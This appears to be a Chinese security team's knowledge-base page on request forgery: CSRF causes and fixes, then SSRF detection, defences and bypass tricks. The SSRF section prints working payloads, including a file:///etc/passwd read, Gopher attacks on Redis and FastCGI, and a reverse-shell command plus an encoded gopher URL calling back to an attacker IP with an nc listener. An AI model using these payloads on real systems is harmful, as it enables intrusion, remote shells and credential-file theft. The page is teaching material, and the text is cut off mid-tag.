<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>请求伪造漏洞 | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="preload" href="/assets/css/0.styles.32ca519c.css" as="style"><link rel="preload" href="/assets/js/app.f7464420.js" as="script"><link rel="preload" href="/assets/js/2.26207483.js" as="script"><link rel="preload" href="/assets/js/73.6dd6c980.js" as="script"><link rel="prefetch" href="/assets/js/10.55514509.js"><link rel="prefetch" href="/assets/js/11.ec576042.js"><link rel="prefetch" href="/assets/js/12.a5584a2f.js"><link rel="prefetch" href="/assets/js/13.c9f84b2e.js"><link rel="prefetch" href="/assets/js/14.d2a5440c.js"><link rel="prefetch" href="/assets/js/15.2f271296.js"><link rel="prefetch" href="/assets/js/16.0895ce42.js"><link rel="prefetch" href="/assets/js/17.627e2976.js"><link rel="prefetch" href="/assets/js/18.73745a4c.js"><link rel="prefetch" href="/assets/js/19.19350186.js"><link rel="prefetch" href="/assets/js/20.e4eac589.js"><link rel="prefetch" href="/assets/js/21.fc0657ba.js"><link rel="prefetch" href="/assets/js/22.f4a1220f.js"><link rel="prefetch" href="/assets/js/23.c8cce92d.js"><link rel="prefetch" href="/assets/js/24.46225ec2.js"><link rel="prefetch" href="/assets/js/25.9b6d75e4.js"><link rel="prefetch" href="/assets/js/26.288f535e.js"><link rel="prefetch" href="/assets/js/27.865bdc75.js"><link rel="prefetch" href="/assets/js/28.f4224fef.js"><link rel="prefetch" href="/assets/js/29.6393a40b.js"><link rel="prefetch" href="/assets/js/3.a509f503.js"><link rel="prefetch" href="/assets/js/30.d5a49f97.js"><link rel="prefetch" href="/assets/js/31.eb3647df.js"><link rel="prefetch" href="/assets/js/32.7f48a571.js"><link rel="prefetch" href="/assets/js/33.1f374ffa.js"><link rel="prefetch" href="/assets/js/34.5a911179.js"><link rel="prefetch" href="/assets/js/35.d2bcc7ef.js"><link rel="prefetch" href="/assets/js/36.42e440bd.js"><link rel="prefetch" href="/assets/js/37.dedbbdea.js"><link rel="prefetch" href="/assets/js/38.d68d1f69.js"><link rel="prefetch" href="/assets/js/39.e278f860.js"><link rel="prefetch" href="/assets/js/4.35636da8.js"><link rel="prefetch" href="/assets/js/40.97f4e937.js"><link rel="prefetch" href="/assets/js/41.38630688.js"><link rel="prefetch" href="/assets/js/42.cae56aa5.js"><link rel="prefetch" href="/assets/js/43.61a04b16.js"><link rel="prefetch" href="/assets/js/44.5c6230f2.js"><link rel="prefetch" href="/assets/js/45.0f1355ae.js"><link rel="prefetch" href="/assets/js/46.c1906649.js"><link rel="prefetch" href="/assets/js/47.7ae220ce.js"><link rel="prefetch" href="/assets/js/48.59af224e.js"><link rel="prefetch" href="/assets/js/49.6a33a171.js"><link rel="prefetch" href="/assets/js/5.08ab40ee.js"><link rel="prefetch" href="/assets/js/50.f14601d2.js"><link rel="prefetch" href="/assets/js/51.f20841fd.js"><link rel="prefetch" href="/assets/js/52.fb0a5327.js"><link rel="prefetch" href="/assets/js/53.8013048c.js"><link rel="prefetch" href="/assets/js/54.d132c2f8.js"><link rel="prefetch" href="/assets/js/55.87aa8b5d.js"><link rel="prefetch" href="/assets/js/56.161f38ad.js"><link rel="prefetch" href="/assets/js/57.bd6a2ef2.js"><link rel="prefetch" href="/assets/js/58.8a69f15a.js"><link rel="prefetch" href="/assets/js/59.93c0e2de.js"><link rel="prefetch" href="/assets/js/6.fda5ce3a.js"><link rel="prefetch" href="/assets/js/60.10091d44.js"><link rel="prefetch" href="/assets/js/61.cd1e3b10.js"><link rel="prefetch" href="/assets/js/62.9c0ad8c5.js"><link rel="prefetch" href="/assets/js/63.4a8dd9d2.js"><link rel="prefetch" href="/assets/js/64.6bf3fede.js"><link rel="prefetch" href="/assets/js/65.7a2ccc50.js"><link rel="prefetch" href="/assets/js/66.874d563b.js"><link rel="prefetch" href="/assets/js/67.bb86eab2.js"><link rel="prefetch" href="/assets/js/68.c1db2a2b.js"><link rel="prefetch" href="/assets/js/69.8141480b.js"><link rel="prefetch" href="/assets/js/7.d1fe6bef.js"><link rel="prefetch" href="/assets/js/70.9fb74c80.js"><link rel="prefetch" href="/assets/js/71.d1e4e9ab.js"><link rel="prefetch" href="/assets/js/72.e6bf83fb.js"><link rel="prefetch" href="/assets/js/74.3612ba47.js"><link rel="prefetch" href="/assets/js/75.6e1a2434.js"><link rel="prefetch" href="/assets/js/76.5bfa4bcc.js"><link rel="prefetch" href="/assets/js/77.784df031.js"><link rel="prefetch" href="/assets/js/78.aa94a0a0.js"><link rel="prefetch" href="/assets/js/79.c4e9a4f2.js"><link rel="prefetch" href="/assets/js/8.63fd05d7.js"><link rel="prefetch" href="/assets/js/80.8d47d1f7.js"><link rel="prefetch" href="/assets/js/81.1160b022.js"><link rel="prefetch" href="/assets/js/82.7d17e5c8.js"><link rel="prefetch" href="/assets/js/83.a2ff144a.js"><link rel="prefetch" href="/assets/js/84.53d29383.js"><link rel="prefetch" href="/assets/js/9.b49161a4.js">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="ant-row"><div class="nav-button"><i aria-label="icon: bars" class="anticon anticon-bars"><svg viewBox="0 0 1024 1024" focusable="false" data-icon="bars" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M912 192H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zM104 228a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0z"></path></svg></i> <span></span></div> <div class="ant-col ant-col-xs-24 ant-col-sm-24 ant-col-md-6 ant-col-lg-5 ant-col-xl-5 ant-col-xxl-4"><a href="/" class="router-link-active home-link"><img src="/assets/logo.svg" alt="狼组安全团队公开知识库" class="logo"> <span class="site-name">狼组安全团队公开知识库</span></a> <div class="search-box mobile-search"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div></div> <div class="ant-col ant-col-xs-0 ant-col-sm-0 ant-col-md-18 ant-col-lg-19 ant-col-xl-19 ant-col-xxl-20"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><ul role="menu" id="nav" class="ant-menu ant-menu-horizontal ant-menu-root ant-menu-light"><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/" class="router-link-active">
          首页
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/guide/">
          使用指南
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/knowledge/" class="router-link-active">
          知识库
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/opensource/">
          开源项目
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="visibility:hidden;position:absolute;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li></ul> <a href="https://github.com/wgpsec" target="_blank" rel="noopener noreferrer" class="repo-link"><i aria-label="icon: github" class="anticon anticon-github"><svg viewBox="64 64 896 896" focusable="false" data-icon="github" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M511.6 76.3C264.3 76.2 64 276.4 64 523.5 64 718.9 189.3 885 363.8 946c23.5 5.9 19.9-10.8 19.9-22.2v-77.5c-135.7 15.9-141.2-73.9-150.3-88.9C215 726 171.5 718 184.5 703c30.9-15.9 62.4 4 98.9 57.9 26.4 39.1 77.9 32.5 104 26 5.7-23.5 17.9-44.5 34.7-60.8-140.6-25.2-199.2-111-199.2-213 0-49.5 16.3-95 48.3-131.7-20.4-60.5 1.9-112.3 4.9-120 58.1-5.2 118.5 41.6 123.2 45.3 33-8.9 70.7-13.6 112.9-13.6 42.4 0 80.2 4.9 113.5 13.9 11.3-8.6 67.3-48.8 121.3-43.9 2.9 7.7 24.7 58.3 5.5 118 32.4 36.8 48.9 82.7 48.9 132.3 0 102.2-59 188.1-200 212.9a127.5 127.5 0 0 1 38.1 91v112.5c.8 9 0 17.9 15 17.9 177.1-59.7 304.6-227 304.6-424.1 0-247.2-200.4-447.3-447.5-447.3z"></path></svg></i></a></nav></div></div> <!----></header> <aside class="sidebar"><div><div class="promo"><div id="promo_3"><div class="promo_title">赞助商</div> <button type="button" class="ant-btn ant-btn-primary ant-btn-background-ghost"><span>成为赞助商</span></button></div></div> <div role="separator" id="reset-margin" class="ant-divider ant-divider-horizontal ant-divider-dashed"></div></div> <ul class="sidebar-links"><li><a href="/knowledge/" aria-current="page" title="知识库广告位招租" class="sidebar-link">知识库广告位招租</a></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>CTF</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>基础知识</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>工具手册</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading open"><span>Web安全</span> <span class="arrow down"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/knowledge/web/" aria-current="page" title="分类简介" class="sidebar-link">分类简介</a></li><li><a href="/knowledge/web/unauthorized.html" title="未授权访问总结" class="sidebar-link">未授权访问总结</a></li><li><a href="/knowledge/web/infoleak.html" title="信息泄露漏洞" class="sidebar-link">信息泄露漏洞</a></li><li><a href="/knowledge/web/fileuploads.html" title="文件上传漏洞" class="sidebar-link">文件上传漏洞</a></li><li><a href="/knowledge/web/fileincludes.html" title="文件包含漏洞" class="sidebar-link">文件包含漏洞</a></li><li><a href="/knowledge/web/cmd_injection.html" title="命令注入漏洞" class="sidebar-link">命令注入漏洞</a></li><li><a href="/knowledge/web/logical.html" title="常见逻辑漏洞" class="sidebar-link">常见逻辑漏洞</a></li><li><a href="/knowledge/web/csrf-ssrf.html" aria-current="page" title="请求伪造漏洞" class="active sidebar-link">请求伪造漏洞</a></li><li><a href="/knowledge/web/same-origin-policy.html" title="同源策略和域安全" class="sidebar-link">同源策略和域安全</a></li><li><a href="/knowledge/web/xss.html" title="XSS 跨站脚本漏洞" class="sidebar-link">XSS 跨站脚本漏洞</a></li><li><a href="/knowledge/web/xxe.html" title="XML实体注入漏洞" class="sidebar-link">XML实体注入漏洞</a></li><li><a href="/knowledge/web/sql_injection.html" title="SQL注入漏洞" class="sidebar-link">SQL注入漏洞</a></li><li><a href="/knowledge/web/mysql-write-shell.html" title="MySQL写shell" class="sidebar-link">MySQL写shell</a></li><li><a href="/knowledge/web/websocket-sec.html" title="WebSocket安全问题分析" class="sidebar-link">WebSocket安全问题分析</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>攻防对抗</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>代码审计</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li></ul></aside> <main class="page"> <div class="theme-antdocs-content content__default"><h2 id="csrf">CSRF <a href="#csrf" class="header-anchor">#</a></h2> <p>CSRF是跨站请求伪造攻击，由客户端发起，是由于没有在执行关键操作时，进行<code>是否由用户自愿发起的</code>确认攻击者通过用户的浏览器来注入额外的网络请求，来破坏一个网站会话的完整性。</p> <p>比如某网站<strong>用户信息修改</strong>功能，没有验证Referer也没添加Token，攻击者可以用HTML构造恶意代码提交POST请求，诱骗已经登陆的受害者点击，可以直接修改用户信息</p> <p><strong>修复建议</strong></p> <blockquote><ul><li>验证Referer</li> <li>添加token</li></ul></blockquote> <p><strong>token和referer做横向对比，谁安全等级高？</strong></p> <p>token安全等级更高，因为并不是任何服务器都可以取得referer，如果从HTTPS跳到HTTP，也不会发送referer。token的话，要遵守不可预测性原则，保证其随机性（ 通过当前时间戳生成随机数 ）</p> <p><strong>对referer的验证，从什么角度去做？如果做，怎么杜绝问题</strong></p> <p>对header中的referer的验证，一个是空referer，一个是referer过滤或者检测不完善。
为了杜绝这种问题，在验证的白名单中，正则规则应当写完善。</p> <p><strong>针对token，对token测试会注意哪方面内容，会对token的哪方面进行测试？</strong></p> <p>针对token的攻击，一是对它本身的攻击，重放测试一次性、分析加密规则、校验方式是否正确等;</p> <p>二是结合信息泄露漏洞对它的获取，结合着发起组合攻击;</p> <p>信息泄露有可能是缓存、日志、get，也有可能是利用跨站;</p> <p>很多跳转登录的都依赖token，有一个跳转漏洞加反射型跨站就可以组合成登录劫持了;</p> <h2 id="ssrf">SSRF <a href="#ssrf" class="header-anchor">#</a></h2> <p>SSRF(Server-Side Request Forgery:服务器端请求伪造)  是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。</p> <p>攻击的目标是从外网无法访问的内部系统	( 正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统 )</p> <p><strong>SSRF 成因</strong>是由于服务端提供了从其他服务器应用获取数据的功能，且没有对目标地址做过滤与限制 (没有做合法性验证)。</p> <h3 id="出现场景">出现场景 <a href="#出现场景" class="header-anchor">#</a></h3> <p>能够对外发起网络请求的地方，就可能存在 SSRF 漏洞。</p> <p>在线识图，在线文档翻译，分享，订阅等，这些有的都会发起网络请求。</p> <p>从指定URL地址获取网页文本内容，加载指定地址的图片，下载等等。</p> <h3 id="检测">检测 <a href="#检测" class="header-anchor">#</a></h3> <p>SSRF漏洞的验证方法：</p> <blockquote><p>1）通过抓包分析发送的请求是否是由服务器的发送的，从而来判断是否存在SSRF漏洞</p> <p>2）在页面源码中查找访问的资源地址 ，如果该资源地址类型为 www.baidu.com/xxx.php?image=（地址）的就可能存在SSRF漏洞</p></blockquote> <h3 id="常见防御和绕过">常见防御和绕过 <a href="#常见防御和绕过" class="header-anchor">#</a></h3> <blockquote><p><strong>检查Host是否是内网IP</strong> ；IP地址转换绕过，DNS解析绕过(xip.io)，利用URL解析器滥用</p> <p><strong>限制可用协议和请求端口</strong>(HTTP、HTTPS；80、443)；302跳转绕过</p> <p><strong>禁止跳转</strong>；</p> <p><strong>URL长度限制</strong>；短链接：<a href="https://tinyurl.com/" target="_blank" rel="noopener noreferrer">生成短链接的网站<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p></blockquote> <h4 id="攻击利用方法">攻击利用方法 <a href="#攻击利用方法" class="header-anchor">#</a></h4> <h4 id="内网端口扫描"><strong>内网端口扫描</strong> <a href="#内网端口扫描" class="header-anchor">#</a></h4> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>ssrf.php?url<span class="token operator">=</span><span class="token number">127.0</span>.0.1:3306		<span class="token comment">#探测是否存在MySQL服务</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h4 id="file协议读取内网文件"><strong>file协议读取内网文件</strong> <a href="#file协议读取内网文件" class="header-anchor">#</a></h4> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>ssrf.php?url<span class="token operator">=</span>file:///etc/passwd
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h4 id="gopher打redis"><strong>GOPHER打redis</strong> <a href="#gopher打redis" class="header-anchor">#</a></h4> <blockquote><p>**条件：**能未授权或者通过弱口令认证访问到Redis服务器</p></blockquote> <p>方式主要有：</p> <blockquote><p>1、绝对路径写webshell</p> <p>2、写contrab计划任务反弹shell</p></blockquote> <p>用脚本直接生成payload后去打就行（<a href="https://github.com/LS95/gopher-redis-auth" target="_blank" rel="noopener noreferrer">脚本在这<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>，RESP协议还是要了解的，不能光会用脚本）</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">curl</span> -v <span class="token string">&quot;payload内容&quot;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h4 id="gopher打fastcgi"><strong>GOPHER打FastCGI</strong> <a href="#gopher打fastcgi" class="header-anchor">#</a></h4> <p>一般来说 FastCGI 都是绑定在 127.0.0.1 端口上的，但是利用 Gopher+SSRF 可以完美攻击 FastCGI 执行任意命令。</p> <p>首先根据<a href="https://github.com/piaca/fcgi_exp" target="_blank" rel="noopener noreferrer">faci_exp<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>生成exp，随后改成支持gopher协议的URL</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>./fcgi_exp system 目标IP <span class="token number">9000</span> /var/www/html/1.php <span class="token string">&quot;bash -i &gt;&amp; /dev/tcp/攻击者IP/2333 0&gt;&amp;1&quot;</span>
<span class="token function">nc</span> -lvv <span class="token number">2333</span> <span class="token operator">&gt;</span> <span class="token number">1</span>.txt
xdd <span class="token number">1</span>.txt
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>构造 Gopher 协议的 URL：</p> <div class="language-cmd line-numbers-mode"><pre class="language-text"><code>gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH97%0E%04REQUEST_METHODPOST%09%5BPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%13SCRIPT_FILENAME/var/www/html/1.php%0D%01DOCUMENT_ROOT/%01%04%00%01%00%00%00%00%01%05%00%01%00a%07%00%3C%3Fphp%20system%28%27bash%20-i%20%3E%26%20/dev/tcp/172.19.23.228/2333%200%3E%261%27%29%3Bdie%28%27-----0vcdb34oju09b8fd-----%0A%27%29%3B%3F%3E%00%00%00%00%00%00%00
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>curl请求</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">curl</span> -v <span class="token string">&quot;Gopher协议的URL&quot;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>本地监听2333端口，收到反弹shell</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">nc</span> -lvv <span class="token number">2333</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><a href="https://www.zhihu.com/question/30672017" target="_blank" rel="noopener noreferrer">如何通俗地解释 CGI、FastCGI、php-fpm 之间的关系？<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <h3 id="常见绕过方法">常见绕过方法 <a href="#常见绕过方法" class="header-anchor">#</a></h3> <h4 id="一、检查ip是否为内网ip">一、检查IP是否为内网IP <a href="#一、检查ip是否为内网ip" class="header-anchor">#</a></h4> <p>很多开发者认为，只要检查一下请求url的host不为内网IP，即可防御SSRF。</p> <p>通常使用正则过滤以下5个IP段：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>192.168.0.0/16
10.0.0.0/8
172.16.0.0/12
127.0.0.0/8
0.0.0.0/8   #在Linux下，127.0.0.1与0.0.0.0都指向本地
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>这种防御方法通常可以用IP地址进制转换绕过</p> <blockquote><p>利用八进制IP地址绕过 0177.0.0.1</p> <p>利用十六进制IP地址绕过 0x7f000001</p> <p>利用十进制的IP地址绕过 2130706433</p></blockquote> <p>他们一个都匹配不上正则表达式， 但实际请求都是127.0.0.1</p> <h4 id="二、dns解析绕过">二、DNS解析绕过 <a href="#二、dns解析绕过" class="header-anchor">#</a></h4> <p>Host可能是IP形式，也可能是域名形式。</p> <p>如果Host是域名形式，我们是没法直接比对的，只要其解析到内网IP上，就可以绕过。</p> <p>网上有个神奇域名 <a href="http://xip.io/" target="_blank" rel="noopener noreferrer">http://xip.io<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a> (有墙)，<a href="https://www.cnblogs.com/wintrysec/p/www.127.0.0.1.xip.io" target="_blank" rel="noopener noreferrer">www.127.0.0.1.xip.io<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>,会自动解析到127.0.0.1</p> <h4 id="三、利用url解析器滥用">三、利用URL解析器滥用 <a href="#三、利用url解析器滥用" class="header-anchor">#</a></h4> <blockquote><p>某些情况下，后端程序可能会对访问的URL进行解析，对解析出来的host地址进行过滤。</p> <p>这时候可能会出现对URL参数解析不当，导致可以绕过过滤</p> <p><a href="http://www.baidu.com@127.0.0.1/" target="_blank" rel="noopener noreferrer">http://www.baidu.com@127.0.0.1<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p>当后端程序通过不正确的正则表达式,对上述URL的内容解析的时候</p> <p>会认为访问URL的host为<a href="https://www.cnblogs.com/wintrysec/p/www.baidu.com" target="_blank" rel="noopener noreferrer">www.baidu.com<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" 